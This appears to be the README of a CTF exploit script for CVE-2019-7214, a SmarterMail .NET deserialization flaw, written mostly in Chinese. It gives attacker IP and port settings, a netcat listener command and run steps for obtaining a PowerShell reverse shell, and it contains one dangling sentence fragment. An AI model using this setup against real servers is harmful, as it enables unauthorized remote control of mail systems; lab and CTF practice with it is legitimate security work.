
For CTF use only (the CVE-2019-7214 also resolves the host from /etc/hosts)
此 Python 脚本针对远程 Windows 计算机上运行的一个易受攻击的服务。它发送一个序列化的 .NET 负载,该负载在攻击者的计算机上启动基于 PowerShell 的反向 shell。
SmarterMail 系统中 .NET 反序列化的远程代码执行。
更新脚本的配置部分以匹配您的环境:
HOSTNAME = 'hostname' # 目标主机名(通过 /etc/hosts 解析)
PORT = 9999 # 目标监听序列化输入的端口
LHOST = '192.168.45.185' # 攻击者 IP(监听器)
LPORT = 4444 # 攻击者监听端口
nc -lvnp 4444
python3 CVE-2019-7214 .py
如果成功,您将在监听器上收到来自目标的 PowerShell 提示符。
System.Management.Automation 功能的反序列化对象。此脚本仅供教育目的使用。未经授权对您不拥有或未经明确许可进行测试的系统使用是非法的且不道德的。